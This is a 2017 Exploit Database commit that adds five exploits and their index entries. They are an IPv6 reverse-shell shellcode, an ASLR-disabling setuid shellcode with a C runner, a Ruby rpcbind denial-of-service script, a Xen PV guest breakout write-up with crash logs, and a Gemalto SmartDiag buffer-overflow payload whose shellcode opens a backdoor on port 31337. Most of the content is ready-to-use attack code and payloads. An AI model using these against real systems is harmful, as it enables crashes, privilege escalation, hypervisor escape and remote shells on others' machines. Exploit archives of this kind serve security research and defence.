DB: 2017-05-09

5 new exploits

RPCBind / libtirpc - Denial of Service
Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)
Xen 64bit PV Guest - pagetable use-after-type-change Breakout
Linux/x86 - Disable ASLR Shellcode (80 bytes)
Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)
This commit is contained in:
Offensive Security 2017-05-09 04:46:38 +00:00
parent 64159294a8
commit 6f37b94a66
6 changed files with 532 additions and 0 deletions

View file

@ -5484,6 +5484,7 @@ id,file,description,date,author,platform,type,port
41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
41957,platforms/windows/dos/41957.html,"Microsoft Internet Explorer 11 - 'CMarkup::DestroySplayTree' Use-After-Free",2017-05-03,"Marcin Ressel",windows,dos,0
41965,platforms/java/dos/41965.txt,"CloudBees Jenkins 2.32.1 - Java Deserialization",2017-05-05,SecuriTeam,java,dos,0
41974,platforms/linux/dos/41974.rb,"RPCBind / libtirpc - Denial of Service",2017-05-08,"Guido Vranken",linux,dos,111
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8970,6 +8971,8 @@ id,file,description,date,author,platform,type,port
41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0
41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -16119,6 +16122,8 @@ id,file,description,date,author,platform,type,port
41827,platforms/win_x86-64/shellcode/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",win_x86-64,shellcode,0
41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (31 bytes)",2017-04-13,WangYihang,lin_x86-64,shellcode,0
41909,platforms/lin_x86/shellcode/41909.c,"Linux/x86 - Egg-hunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode,0
41969,platforms/lin_x86/shellcode/41969.c,"Linux/x86 - Disable ASLR Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode,0
41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,115 @@
[BITS 64]
; **reverse ip6 tcp shell
; * size >= 113 bytes (depends of ip addr, default is ::1)
; * nullbytes free (depends only on ip addr,
; you could always and the ip add to remove
; the nulls like i did with the port)
; * it sleeps and then tries to recconect (default 3 seconds)
;
;shell =
;"\x6a\x0a\x5f\x6a\x01\x5e\x48\x31\xd2\x6a\x29\x58\x0f\x05\x50\x5b"
;"\x52\x48\xb9\x00\x00\x00\x00\x00\x00\x01\x51\xb9\x00\x00\x00\x00"
;"\x51\xba\xff\xff\x05\xc0\x66\x21\xfa\x52\x48\x31\xf6\x56\x6a\x03"
;"\x54\x5f\x6a\x23\x58\x0f\x05\x59\x59\x53\x5f\x54\x5e\x6a\x1c\x5a"
;"\x6a\x2a\x58\x0f\x05\x48\x85\xc0\x75\xe0\x48\x96\x6a\x03\x5e\x6a"
;"\x21\x58\x48\xff\xce\x0f\x05\x75\xf6\x48\xbf\x2f\x2f\x62\x69\x2f"
;"\x73\x68\x56\x57\x48\x31\xd2\x54\x5f\x6a\x3b\x58\x0f\x05"
;
; again, the nulls propably won't even come up with your global ip addr
; if they do, and you don't encodee the payload, you could do some
; bitwise operations
;
; made by srakai (github.com/Srakai)
AF_INET6 equ 10
SOCK_STREAM equ 1
SOCKET equ 41
CONNECT equ 42
DUP2 equ 33
EXECVE equ 59
NANOSLEEP equ 35
section .text
global _start
_start:
; socket()
push AF_INET6
pop rdi
push SOCK_STREAM
pop rsi
xor rdx, rdx
push SOCKET
pop rax
syscall
push rax
pop rbx
; create struct sockaddr_in6
push rdx ;scope id = 0
mov rcx, 0x0100000000000000 ;sin6_addr for local link use:
push rcx ;sin6_addr 0x0100000000000000
mov rcx, 0x0000000000000000 ;sin6_addr 0x0000000000000000
push rcx ;sin6_addr
mov edx, 0xc005FFFF ;sin6_flowinfo=0 , family=AF_INET6, port=1472
and dx, di ;to change port change P, 0xPPPP000A
push rdx
sleep:
xor rsi, rsi
; struct timespec
push rsi ;push 0
push 3 ;seconds to sleep
; nanosleep()
push rsp
pop rdi
push NANOSLEEP
pop rax
syscall
pop rcx ;clear stack
pop rcx
; connect()
push rbx
pop rdi
push rsp
pop rsi
push 28 ;sizeof struct
pop rdx
push CONNECT
pop rax
syscall
test rax, rax ;if (rax&rax) ==0
jnz sleep
; dup2()
xchg rsi, rax ;rsi=0
push 3
pop rsi
dup2:
push DUP2
pop rax
dec rsi
syscall
jnz dup2
; execve()
mov rdi, 0x68732f6e69622f2f
push rsi
push rdi
xor rdx, rdx
push rsp
pop rdi
push EXECVE
pop rax
syscall

View file

@ -0,0 +1,67 @@
/*
Linux/x86
setuid-disable-aslr.c by @abatchy17 - abatchy.com
Shellcode size: 80 bytes
SLAE-885
section .text
global _start
_start:
;
; setruid(0,0)
;
xor ecx,ecx
mov ebx,ecx
push 0x46
pop eax
int 0x80
;
; open("/proc/sys/kernel/randomize_va_spaceX", O_RDWR)
;
xor eax,eax ; EAX = 0
jmp aslr_file
shellcode:
pop ebx ; EBX now points to '/proc/sys/kernel/randomize_va_space'
mov byte [ebx + 35],al
push byte 5
pop eax
push byte 2
pop ecx
int 80h
;
; write(fd, '0', 1)
;
xchg eax, ebx ; One byte less than mov ebx, eax
push byte 4
pop eax
xchg ecx, edx ; ECX already contains 2
dec edx
push byte 0x30
mov ecx, esp ; ECX now points to "0"
int 80h ; EAX will now contains 1
;
; exit(0)
;
int 80h ; Yep, that's it
aslr_file:
call shellcode ; Skips the filename and avoids using JMP
db '/proc/sys/kernel/randomize_va_space'
*/
#include <stdio.h>
#include <string.h>
unsigned char sc[] = "\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x31\xc0\xeb\x1b\x5b\x88\x43\x23\x6a\x05\x58\x6a\x02\x59\xcd\x80\x93\x6a\x04\x58\x87\xca\x4a\x6a\x30\x89\xe1\xcd\x80\xcd\x80\xe8\xe0\xff\xff\xff\x2f\x70\x72\x6f\x63\x2f\x73\x79\x73\x2f\x6b\x65\x72\x6e\x65\x6c\x2f\x72\x61\x6e\x64\x6f\x6d\x69\x7a\x65\x5f\x76\x61\x5f\x73\x70\x61\x63\x65";
int main()
{
printf("Shellcode size: %d\n", strlen(sc));
int (*ret)() = (int(*)())sc;
ret();
}

89
platforms/linux/dos/41974.rb Executable file
View file

@ -0,0 +1,89 @@
#!/usr/bin/ruby
#
# Source: https://raw.githubusercontent.com/guidovranken/rpcbomb/fe53048af2d4fb78c911e71a30f21afcffbbf5e1/rpcbomb.rb
#
# By Guido Vranken https://guidovranken.wordpress.com/
# Thanks to Sean Verity for writing an exploit in Ruby for an earlier
# vulnerability: https://www.exploit-db.com/exploits/26887/
# I've used it as a template.
require 'socket'
def usage
abort "\nusage: ./rpcbomb.rb <target> <# bytes to allocate> [port]\n\n"
end
bomb = """
` + # ,
: @ @ @ @ @ @
@ @ ; . + @ @ @ . @ @
@ @ @ @ @ ` @ @
. ` @ #
; @ @ @ . : @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ ;
@ @ @ @ @ @ @ @ @ @ @ @ @ `
@ @ @ @ @ @ @ @ @ @ @ @ @ @ :
# @ @ @ @ @ @ @ @ @ @ @ @ @ '
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
. @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
+ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
+ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ ,
@ @ @ @ @ @ @ @ @ @ @ @ @
, @ @ @ @ @ @ @ @ @ @ @
` @ @ @ @ @ @ @ @ @
, @ @ @ @ @
r p c b o m b
DoS exploit for *nix rpcbind/libtirpc.
(c) 2017 Guido Vranken.
https://guidovranken.wordpress.com/
"""
puts bomb
if ARGV.length >= 2
begin
host = ARGV[0]
numBytes = Integer(ARGV[1])
port = ARGV.length == 3 ? Integer(ARGV[2]) : 111
rescue
usage
end
pkt = [0].pack('N') # xid
pkt << [0].pack('N') # message type CALL
pkt << [2].pack('N') # RPC version 2
pkt << [100000].pack('N') # Program
pkt << [4].pack('N') # Program version
pkt << [9].pack('N') # Procedure
pkt << [0].pack('N') # Credentials AUTH_NULL
pkt << [0].pack('N') # Credentials length 0
pkt << [0].pack('N') # Credentials AUTH_NULL
pkt << [0].pack('N') # Credentials length 0
pkt << [0].pack('N') # Program: 0
pkt << [0].pack('N') # Ver
pkt << [4].pack('N') # Proc
pkt << [4].pack('N') # Argument length
pkt << [numBytes].pack('N') # Payload
s = UDPSocket.new
s.send(pkt, 0, host, port)
sleep 1.5
begin
s.recvfrom_nonblock(9000)
rescue
puts "No response from server received."
exit()
end
puts "Allocated #{numBytes} bytes at host #{host}:#{port}.\n" +
"\nDamn it feels good to be a gangster.\n\n"
else
usage
end

145
platforms/linux/local/41973.txt Executable file
View file

@ -0,0 +1,145 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1231
This is a bug in Xen that permits an attacker with control over the
kernel of a 64bit X86 PV guest to write arbitrary entries into a live
top-level pagetable.
To prevent PV guests from doing things like mapping live pagetables as
writable, Xen assigns types to physical pages and tracks type-specific
references with a reference counter ("type count", stored in the low
bits of page->u.inuse.type_info).
64-bit PV guests have multiple places in which the addresses of
top-level pagetables are stored:
arch.guest_table_user and arch.guest_table in the vcpu struct point to
the pagetables the guest has designated as user-mode top-level
pagetable and kernel-mode top-level pagetable. Both of these fields
take a type-specific reference on the pagetable to prevent the guest
from mapping it as writable.
arch.cr3 in the vcpu struct points to the current top-level pagetable
of the vCPU. While the vCPU is scheduled, arch.cr3 is the same as the
physical CPU's CR3.
arch.cr3 does not take an extra type-specific reference; it borrows
the reference from either arch.guest_table_user or arch.guest_table.
This means that whenever the field from which the reference is
borrowed is updated, arch.cr3 (together with the physical CR3) must be
updated as well.
The guest can update arch.guest_table_user and arch.guest_table using
__HYPERVISOR_mmuext_op with commands
MMUEXT_NEW_USER_BASEPTR (for arch.guest_table_user) and
MMUEXT_NEW_BASEPTR (for arch.guest_table). The handlers for these
commands assume that when the hypercall is executed, arch.cr3 always
equals arch.guest_table: The MMUEXT_NEW_BASEPTR handler updates
arch.cr3 to the new arch.guest_table, the MMUEXT_NEW_USER_BASEPTR
handler doesn't touch arch.cr3.
Hypercalls can only be executed from kernel context, so on hypercall
entry, arch.cr3==arch.guest_table is indeed true. However, using the
__HYPERVISOR_multicall hypercall, it is possible to execute the
__HYPERVISOR_iret hypercall, which can switch the pagetables to user
context, immediately followed by the __HYPERVISOR_mmuext_op hypercall
before actually entering guest user context.
This can be exploited from guest kernel context roughly as follows:
- copy all entries from the top-level kernel pagetable over the
top-level user pagetable (to make it possible for a post-iret
hypercall to access guest kernel memory)
- allocate a new page to be used later as top-level user pagetable,
copy the contents of the current top-level user pagetable into it,
remap it as readonly and pin it as a top-level pagetable
- perform the following operations in a single multicall:
- switch to user context using __HYPERVISOR_iret
- change arch.guest_table_user to the new top-level user pagetable
using __HYPERVISOR_mmuext_op with command MMUEXT_NEW_USER_BASEPTR
- unpin the old top-level user pagetable
- map the old top-level user pagetable as writable
- write crafted entries into the old top-level user pagetable
I have attached a proof of concept that corrupts the top-level
pagetable entry that maps the hypervisor text, causing a host
triplefault. I have tested the proof of concept in the following
configurations:
configuration 1:
running inside VMware Workstation
Xen version "Xen version 4.6.0 (Ubuntu 4.6.0-1ubuntu4.3)"
dom0: Ubuntu 16.04.2, Linux 4.8.0-41-generic #44~16.04.1-Ubuntu
unprivileged guest: Ubuntu 16.04.2, Linux 4.4.0-66-generic #87-Ubuntu
configuration 2:
running on a physical machine with Qubes OS 3.2 installed
Xen version 4.6.4
Compile the PoC with ./compile.sh, then run ./attack as root.
PoC Filename: xen_ptuaf.tar
################################################################################
Here's an exploit that causes the hypervisor to execute shellcode that then deliberately causes a hypervisor GPF by calling a noncanonical address. Usage:
root@pv-guest:~/xen_ptuaf_hv_shellcode_exec# ./compile.sh
make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic'
LD /root/xen_ptuaf_hv_shellcode_exec/built-in.o
CC [M] /root/xen_ptuaf_hv_shellcode_exec/module.o
nasm -f elf64 -o /root/xen_ptuaf_hv_shellcode_exec/native.o /root/xen_ptuaf_hv_shellcode_exec/native.asm
LD [M] /root/xen_ptuaf_hv_shellcode_exec/test.o
Building modules, stage 2.
MODPOST 1 modules
WARNING: could not find /root/xen_ptuaf_hv_shellcode_exec/.native.o.cmd for /root/xen_ptuaf_hv_shellcode_exec/native.o
CC /root/xen_ptuaf_hv_shellcode_exec/test.mod.o
LD [M] /root/xen_ptuaf_hv_shellcode_exec/test.ko
make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic'
root@pv-guest:~/xen_ptuaf_hv_shellcode_exec# ./attack
kernel CR3: 0xaa2dd000
L1 self-mapping is up, should have reliable pagetable control now
virt_to_pte(0x7f5bd439a000)
[ rest of output missing because of VM crash ]
Serial output:
(XEN) ----[ Xen-4.6.0 x86_64 debug=n Tainted: C ]----
(XEN) CPU: 2
(XEN) RIP: e008:[<00007f5bd439a03f>] 00007f5bd439a03f
(XEN) RFLAGS: 0000000000010246 CONTEXT: hypervisor (d1v2)
(XEN) rax: 1337133713371337 rbx: 1337133713371337 rcx: 1337133713371337
(XEN) rdx: 1337133713371337 rsi: 00007ffe98b5e248 rdi: 0000600000003850
(XEN) rbp: 1337133713371337 rsp: ffff8301abb37f30 r8: 0000000000000000
(XEN) r9: 000000000000001b r10: 0000000000000000 r11: 0000000000000202
(XEN) r12: 0000000080000000 r13: ffff8800026dd000 r14: ffff880003453c88
(XEN) r15: 0000000000000007 cr0: 0000000080050033 cr4: 00000000001506a0
(XEN) cr3: 00000000aa2dc000 cr2: ffff88007cfb2e98
(XEN) ds: 0000 es: 0000 fs: 0000 gs: 0000 ss: 0000 cs: e008
(XEN) Xen stack trace from rsp=ffff8301abb37f30:
(XEN) 1337133713371337 1337133713371337 1337133713371337 1337133713371337
(XEN) 1337133713371337 1337133713371337 1337133713371337 1337133713371337
(XEN) 1337133713371337 1337133713371337 1337133713371337 1337133713371337
(XEN) 1337133713371337 0000000000401556 000000000000e033 0000000000000246
(XEN) 00007ffe98b5e208 000000000000e02b 0000000000000000 0000000000000000
(XEN) 0000000000000000 0000000000000000 0000000000000002 ffff830088c9c000
(XEN) 000000312b835580 0000000000000000
(XEN) Xen call trace:
(XEN) [<00007f5bd439a03f>] 00007f5bd439a03f
(XEN)
(XEN)
(XEN) ****************************************
(XEN) Panic on CPU 2:
(XEN) GENERAL PROTECTION FAULT
(XEN) [error_code=0000]
(XEN) ****************************************
(XEN)
(XEN) Reboot in five seconds...
PoC Filename: xen_ptuaf_hv_shellcode_exec.tar
Proofs of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41973.zip

111
platforms/windows/local/41972.txt Executable file
View file

@ -0,0 +1,111 @@
# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow
- SEH Overwrite
# Date: 16-03-2017
# Software Link: http://support.gemalto.com/index.php?id=download_tools
# Exploit Author: Majid Alqabandi
# Contact: https://www.linkedin.com/in/majidalqabandi/
# CVE: CVE-2017-6953
# Category: Local - command execution - Buffer Overflow - SEH Overwrite.
1. Description
SymDiag.exe is vulnerable to buffer overflow, SEH overwrite.
When trying to (Register a new card), Input fields are vulnerable to stack
overflow attack which leads to code execution and other possible security
threats.
2. Proof of Concept
The following PoC is provided code will:
- Exploit the vulnerability.
- Execute shell code.
- Create a backdoor on port 31337.
To exploit, start SmartDiag.exe tool, choose "Register a new card", on the
ATR use the following payload (Tested on Win7x64 & Win8x64 - SmartDiag
v2.5):
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
52834000528340005283400052834000572b0410477f40008c214100f494
400041ed40003b4140003552011078ab0110010000009cf2021000100000
328b031040000000d02203100120400026e6400090909090e2f500109090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
9090909090909090ddc1d97424f4bbc4aa698a5833c9b15683e8fc315814
0358d0489c7630055f87c076e962f1a48de7a378c5aa4ff28b5ec4760450
6d3c725f6ef0ba33ac92464ee0747681f575bffcf524688aa7d81dce7bd8
f144c3a2749ab71876cb671630f30c70e102c162dd4d6e50954fa6a8567e
8667694e0b79ad69f30cc5898e161ef3549283531f046065ccd3e369b990
ac6d3c74c78ab57b081b8d5f8c4756c1952d39fec68ae65a8c39f3ddcf55
30d0efa55e638397c1df0b948af9ccdba1be432249bf4ae11defe4c01d64
f5edc82ba541a28b152212647cad4d947f67f892b153a974b06337ec3d85
adfe6b1d593d4896fe3eba8a57a9f2c46fd602c3dc7baa8496976fb4a9bd
c7bf92569dd151c6a2fb016b3060d1e2293f86a39c36425e86e070a35eca
3078a3d5b90d9ff1a9cb20be9d8376684b6221da253c9eb4a1b9ec06b7c5
38f15777954468b8714111a4e1aec86c11e550c4baa00154a752fc9bded0
f46325c87d61614e6e1bfa3b9088fb69AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
3. Solution:
Vendor has been informed and confirmed the issue, no fix is available yet
from vendor.